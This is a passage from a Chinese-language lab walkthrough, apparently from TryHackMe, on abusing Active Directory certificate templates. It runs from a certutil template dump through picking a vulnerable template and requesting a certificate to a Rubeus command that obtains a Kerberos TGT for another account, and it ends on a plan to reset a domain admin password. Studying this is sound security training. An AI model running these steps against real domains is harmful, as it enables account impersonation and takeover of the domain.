Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 1cCertificate Template Name (Certificate Type)SmartcardUserExtension[1]:2.5.29.37: Flags = 0, Length = 22Enhanced Key UsageSecure Email (1.3.6.1.5.5.7.3.4)Client Authentication (1.3.6.1.5.5.7.3.2)Smart Card Logon (1.3.6.1.4.1.311.20.2.2)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Key Encipherment (a0)TemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[28]:TemplatePropCommonName = SubCATemplatePropFriendlyName = Subordinate Certification AuthorityTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.0TemplatePropMajorRevision = 5TemplatePropDescription = Certification authority (CA)TemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.18TemplatePropEnrollmentFlags = 0TemplatePropSubjectNameFlags = 1CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1TemplatePropPrivateKeyFlags = 10 (16)CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 102d1 (66257)CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1CT_FLAG_EXPORTABLE_KEY -- 10 (16)CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_IS_CA -- 80 (128)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = cCertificate Template Name (Certificate Type)SubCAExtension[1]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Certificate Signing, Off-line CRL Signing, CRL Signing (86)Extension[2]:2.5.29.19: Flags = 1(Critical), Length = 5Basic ConstraintsSubject Type=CAPath Length Constraint=NoneTemplatePropValidityPeriod = 5 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[29]:TemplatePropCommonName = CTLSigningTemplatePropFriendlyName = Trust List SigningTemplatePropEKUs =1 ObjectIds:1.3.6.1.4.1.311.10.3.1 Microsoft Trust List SigningTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.01: Microsoft Base Cryptographic Provider v1.02: Microsoft Base DSS Cryptographic ProviderTemplatePropMajorRevision = 3TemplatePropDescription = UserTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.10TemplatePropEnrollmentFlags = 20 (32)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = 82000000 (-2113929216)CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10220 (66080)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 16Certificate Template Name (Certificate Type)CTLSigningExtension[1]:2.5.29.37: Flags = 0, Length = eEnhanced Key UsageMicrosoft Trust List Signing (1.3.6.1.4.1.311.10.3.1)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature (80)TemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[30]:TemplatePropCommonName = UserTemplatePropFriendlyName = UserTemplatePropEKUs =3 ObjectIds:1.3.6.1.4.1.311.10.3.4 Encrypting File System1.3.6.1.5.5.7.3.4 Secure Email1.3.6.1.5.5.7.3.2 Client AuthenticationTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.01: Microsoft Base Cryptographic Provider v1.0TemplatePropMajorRevision = 3TemplatePropDescription = UserTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.1TemplatePropEnrollmentFlags = 29 (41)CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1CT_FLAG_PUBLISH_TO_DS -- 8CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = a6000000 (-1509949440)CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL -- 4000000 (67108864)CT_FLAG_SUBJECT_REQUIRE_EMAIL -- 20000000 (536870912)CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)TemplatePropPrivateKeyFlags = 10 (16)CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 1023a (66106)CT_FLAG_ADD_EMAIL -- 2CT_FLAG_PUBLISH_TO_DS -- 8CT_FLAG_EXPORTABLE_KEY -- 10 (16)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DU)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Domain UsersAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = aCertificate Template Name (Certificate Type)UserExtension[1]:2.5.29.37: Flags = 0, Length = 22Enhanced Key UsageEncrypting File System (1.3.6.1.4.1.311.10.3.4)Secure Email (1.3.6.1.5.5.7.3.4)Client Authentication (1.3.6.1.5.5.7.3.2)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Key Encipherment (a0)TemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[31]:TemplatePropCommonName = UserRequestTemplatePropFriendlyName = User RequestTemplatePropEKUs =3 ObjectIds:1.3.6.1.5.5.7.3.2 Client Authentication1.3.6.1.5.5.7.3.4 Secure Email1.3.6.1.4.1.311.10.3.4 Encrypting File SystemTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.0TemplatePropMajorRevision = 64 (100)TemplatePropDescription = UserTemplatePropSchemaVersion = 2TemplatePropMinorRevision = a (10)TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.13950390.3651808 User RequestTemplatePropV1ApplicationPolicy =3 ObjectIds:1.3.6.1.5.5.7.3.2 Client Authentication1.3.6.1.5.5.7.3.4 Secure Email1.3.6.1.4.1.311.10.3.4 Encrypting File SystemTemplatePropEnrollmentFlags = 19 (25)CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1CT_FLAG_PUBLISH_TO_DS -- 8CT_FLAG_AUTO_ENROLLMENT_CHECK_USER_DS_CERTIFICATE -- 10 (16)TemplatePropSubjectNameFlags = 1CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1TemplatePropPrivateKeyFlags = 1010010 (16842768)CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_2003<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 10000 (65536)TEMPLATE_CLIENT_VER_XP<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 1000000 (16777216)TemplatePropGeneralFlags = 2023a (131642)CT_FLAG_ADD_EMAIL -- 2CT_FLAG_PUBLISH_TO_DS -- 8CT_FLAG_EXPORTABLE_KEY -- 10 (16)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_MODIFIED -- 20000 (131072)TemplatePropSecurityDescriptor = O:LAG:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DU)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(OA;;CR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;AU)(OA;;CR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;AU)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;LA)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Domain UsersAllow Enroll LUNAR\Enterprise AdminsAllow Enroll NT AUTHORITY\Authenticated UsersAllow Auto-Enroll NT AUTHORITY\Authenticated UsersAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Full Control LUNAR\AdministratorAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =4 Extensions:Extension[0]:1.3.6.1.4.1.311.21.7: Flags = 0, Length = 31Certificate Template InformationTemplate=User Request(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.13950390.3651808)Major Version Number=100Minor Version Number=10Extension[1]:2.5.29.37: Flags = 0, Length = 22Enhanced Key UsageClient Authentication (1.3.6.1.5.5.7.3.2)Secure Email (1.3.6.1.5.5.7.3.4)Encrypting File System (1.3.6.1.4.1.311.10.3.4)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Key Encipherment (a0)Extension[3]:1.3.6.1.4.1.311.21.10: Flags = 0, Length = 28Application Policies[1]Application Certificate Policy:Policy Identifier=Client Authentication[2]Application Certificate Policy:Policy Identifier=Secure Email[3]Application Certificate Policy:Policy Identifier=Encrypting File SystemTemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[32]:TemplatePropCommonName = UserSignatureTemplatePropFriendlyName = User Signature OnlyTemplatePropEKUs =2 ObjectIds:1.3.6.1.5.5.7.3.4 Secure Email1.3.6.1.5.5.7.3.2 Client AuthenticationTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.01: Microsoft Base Cryptographic Provider v1.02: Microsoft Base DSS Cryptographic ProviderTemplatePropMajorRevision = 4TemplatePropDescription = UserTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.2TemplatePropEnrollmentFlags = 20 (32)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = a6000000 (-1509949440)CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL -- 4000000 (67108864)CT_FLAG_SUBJECT_REQUIRE_EMAIL -- 20000000 (536870912)CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10222 (66082)CT_FLAG_ADD_EMAIL -- 2CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DU)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Domain UsersAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 1cCertificate Template Name (Certificate Type)UserSignatureExtension[1]:2.5.29.37: Flags = 0, Length = 16Enhanced Key UsageSecure Email (1.3.6.1.5.5.7.3.4)Client Authentication (1.3.6.1.5.5.7.3.2)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature (80)TemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[33]:TemplatePropCommonName = WebServerTemplatePropFriendlyName = Web ServerTemplatePropEKUs =1 ObjectIds:1.3.6.1.5.5.7.3.1 Server AuthenticationTemplatePropCryptoProviders =0: Microsoft RSA SChannel Cryptographic Provider1: Microsoft DH SChannel Cryptographic ProviderTemplatePropMajorRevision = 4TemplatePropDescription = ComputerTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.16TemplatePropEnrollmentFlags = 0TemplatePropSubjectNameFlags = 1CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10241 (66113)CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 14Certificate Template Name (Certificate Type)WebServerExtension[1]:2.5.29.37: Flags = 0, Length = cEnhanced Key UsageServer Authentication (1.3.6.1.5.5.7.3.1)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Key Encipherment (a0)TemplatePropValidityPeriod = 2 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[34]:TemplatePropCommonName = WorkstationTemplatePropFriendlyName = Workstation AuthenticationTemplatePropEKUs =1 ObjectIds:1.3.6.1.5.5.7.3.2 Client AuthenticationTemplatePropCryptoProviders =0: Microsoft RSA SChannel Cryptographic ProviderTemplatePropMajorRevision = 65 (101)TemplatePropDescription = ComputerTemplatePropSchemaVersion = 2TemplatePropMinorRevision = 0TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.30 Workstation AuthenticationTemplatePropV1ApplicationPolicy =1 ObjectIds:1.3.6.1.5.5.7.3.2 Client AuthenticationTemplatePropEnrollmentFlags = 20 (32)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = 8000000 (134217728)CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10260 (66144)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DC)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Domain ComputersAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =4 Extensions:Extension[0]:1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2bCertificate Template InformationTemplate=Workstation Authentication(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.30)Major Version Number=101Minor Version Number=0Extension[1]:2.5.29.37: Flags = 0, Length = cEnhanced Key UsageClient Authentication (1.3.6.1.5.5.7.3.2)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Key Encipherment (a0)Extension[3]:1.3.6.1.4.1.311.21.10: Flags = 0, Length = eApplication Policies[1]Application Certificate Policy:Policy Identifier=Client AuthenticationTemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksCertUtil: -Template command completed successfully.
在每个输出中,每个模板都是使用
Template[X]标识模板
:::color3 我们要选择的特殊模板应该具有以下特性:
- 我们需要拥有请求证书的相关请求和拥有这些权限的账户的模板
- 允许客户端身份验证的模板,这意味这我们可以将其应用于 Kerberos 身份验证
- 允许我们更改 SAN 的模板
:::
:::info
- Client Authentication - 该证书可用于客户认证
- CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT - 证书模板允许我们指定主题替代名称(SAN
- CTPRIVATEKEY_FLAG_EXPORTABLE_KEY - 该证书将可与私钥一起导出
- Certificate Permissions - 我们有使用证书模板的必要权限
:::
参数一: **Relevant Permissions**
我们需要具有**<font style="color:#DF2A3F;">生成证书</font>**请求的权限才能使漏洞发挥作用,我们需要寻找具有 Allow Enroll__ or Allow Full Control 的权限。
参数二:Client Authentication
一旦我们找到允许我们请求的证书模板,下一步就是寻找具有 Client Authentication __EKU ,此 EKU 意味着该证书可用于 Kerberos 身份验证。 参数三: Client Specifies SAN 最后我们需要验证模板是否运行<font style="color:rgb(33, 37, 41);">证书客户端</font>指定 SAN, SAN 通常类似于我们要加密的网站 URL,例如: tryhackme.com , 但是,如果我们有能力控制 SAN,我们就可以利用证书为我们选择的任何AD帐户实际生成 kerberos 票证!
我们需要寻找具有 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT — 1
:::danger
当我们找到具有这三个参数的证书模板我们就可以开始攻击
:::
## 生成恶意证书
我们使用 WIN+R打开 Microsoft 管理控制台。通过在运行窗口中键入mmc来加载控制台:

在此窗口中,我们需要添加证书管理单元:


然后我们展开Certificates选项,右键单击Personal,选择All Tasks,然后单击Request New Certificate:








现在我们就生成了一个证书,最后一步是实际导出证书以准备使用。右键单击证书,选择所有任务,然后选择导出:




通过证书模拟账户
现在我们就可以模拟用户了
我们将使用 Rubeus来请求 TGT :
C:\THMTools> .\Rubeus.exe asktgt /user:svc.gitlab /enctype:aes256 /certificate:vulncert.pfx /password:tryhackme /outfile:svc.gitlab.kirbi /domain:lunar.eruca.com /dc:10.10.69.219 _
_____ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.0
[*] Action: Ask TGT
[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=vulncert
[*] Building AS-REQ (w/ PKINIT preauth) for: 'lunar.eruca.com\svc.gitlab'
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGADCCBfygAwIBBaEDAgEWooIE+jCCBPZhggTyMIIE7qADAgEFoREbD0xVTkFSLkVSVUNBLkNPTaIk
MCKgAwIBAqEbMBkbBmtyYnRndBsPbHVuYXIuZXJ1Y2EuY29to4IErDCCBKigAwIBEqEDAgECooIEmgSC
BJaqEcIY2IcGQKFNgPbDVY0ZXsEdeJAmAL2ARoESt1XvdKC5Y94GECr+FoxztaW2DVmTpou8g116F6mZ
nSHYrZXEJc5Z84qMGEzEpa38zLGEdSyqIFL9/avtTHqBeqpR4kzY2B/ekqhkUvdb5jqapIK4MkKMd4D/
MHLr5jqTv6Ze2nwTMAcImRpxE5HSxFKO7efZcz2glEk2mQptLtUq+kdFEhDozHMAuF/wAvCXiQEO8NkD
zeyabnPAtE3Vca6vfmzVTJnLUKMIuYOi+7DgDHgBVbuXqorphZNl4L6o5NmviXNMYazDybaxKRvzwrSr
2Ud1MYmJcIsL3DMBa4bxR57Eb5FhOVD29xM+X+lswtWhUO9mUrVyEuHtfV7DUxA94OvX1QmCcas4LXQW
ggOit/DCJdeyE8JjikZcR1yL4u7g+vwD+SLkusCZE08XDj6lopupt2Hl8j2QLR2ImOJjq54scOllW4lM
Qek4yqKwP6p0oo4ICxusM8cPwPUxVcYdTCh+BczRTbpoKiFnI+0qOZDtgaJZ/neRdRktYhTsGL39VHB5
i+kOk3CkcstLfdAP1ck4O+NywDMUK+PhGJM/7ykFe2zICIMaGYGnUDRrad3z8dpQWGPyTBgTvemwS3wW
NuPbQFFaoyiDiJyXPh+VqivhTUX9st80ZJZWzpE7P1pTNPGq38/6NyLjiE9srbOt6hCLzUaOSMGH1Enf
SYmNljeW2R0gsFWBaFt16AHfT9G9Et2nOCJn/D/OFePFyR4uJF44p82CmVlBhzOxnCaGtQM2v9lwBqQF
CcVLjxGXqKrPUr1RUGthP861jhMoXD4jBJ/Q32CkgVdlJRMweqcIfNqP/4mEjbUN5qjNqejYdUb/b5xw
S794AkaKHcLFvukd41VTm87VvDOp6mM5lID/PLtTCPUZ0zrEb01SNiCdB5IAfnV23vmqsOocis4uZklG
CNdI1/lsICpS/jaK6NM/0oKehMg+h4VAFLx4HnTSY4ugbrkdxU948qxPEfok/P6umEuny7yTDQFoCUKk
RuLXbtwwplYTGBDLfzwhcNX8kc/GGLbH9+B8zRXxhd3TGQ7ZT03r798AjobKx024ozt6g4gjS5k/yIT+
f29XrPzc+UODunO2Qv8JM5NAE3L6ryHp/DdgTaXGBRccgQBeQERNz6wxkdVK6SB7juOjU5JoZ5ZfmTuO
hQ5hnboH1GvMy4+zeU2P7foWEJE76i9uZMbjUilbWRERYUL/ZjjXQBVWBaxoAdFIoawAzSXUZniNavnS
n22qqgbd79Zj+lRavAb7Wlk5Gul4G6LMkh2MIJ4JOnrV0JV1yOhoqZ5V6KX/2r7ecyrVZIf2Qf0+ci9G
vboJiLvWKgXkx7VaKbcLhO743BNYyq57nPNvWhVt3jbFmEq4nTdNou6hQHG4O5hVMhBKGgTwYz3yFPOP
iuxroniQawSUJbmwObxVeoculPhxEJ69MSgKROTXrKrQAJ84D5QJHQYZus6w+LtodZn1//ZLhgILeFsY
5K6d4ot2eqEr/A4Vu+wFjGjw87FTvHVcf8HdtGhqkawtPOrzo4HxMIHuoAMCAQCigeYEgeN9geAwgd2g
gdowgdcwgdSgKzApoAMCARKhIgQgQr+FUX+/G2jHgAR2ssW11+lhaPlB6dMD8V5/rENwJVWhERsPTFVO
QVIuRVJVQ0EuQ09NohcwFaADAgEBoQ4wDBsKc3ZjLmdpdGxhYqMHAwUAQOEAAKURGA8yMDIyMDIwNjE3
NTQ0NlqmERgPMjAyMjAyMDcwMzU0NDZapxEYDzIwMjIwMjEzMTc1NDQ2WqgRGw9MVU5BUi5FUlVDQS5D
T02pJDAioAMCAQKhGzAZGwZrcmJ0Z3QbD2x1bmFyLmVydWNhLmNvbQ=
ServiceName : krbtgt/lunar.eruca.com
ServiceRealm : LUNAR.ERUCA.COM
UserName : svc.gitlab
UserRealm : LUNAR.ERUCA.COM
StartTime : 2/6/2022 5:54:46 PM
EndTime : 2/7/2022 3:54:46 AM
RenewTill : 2/13/2022 5:54:46 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : Qr+FUX+/G2jHgAR2ssW11+lhaPlB6dMD8V5/rENwJVU=
ASREP (key) : BF2483247FA4CB89DA0417DFEC7FC57C79170BAB55497E0C45F19D976FD617ED
我们现在需要使用此TGT来获得访问权限。我们再次使用 <font style="color:rgb(33, 37, 41);">Rubeus</font>,我们将使用此票证来修改以为域管理员密码:
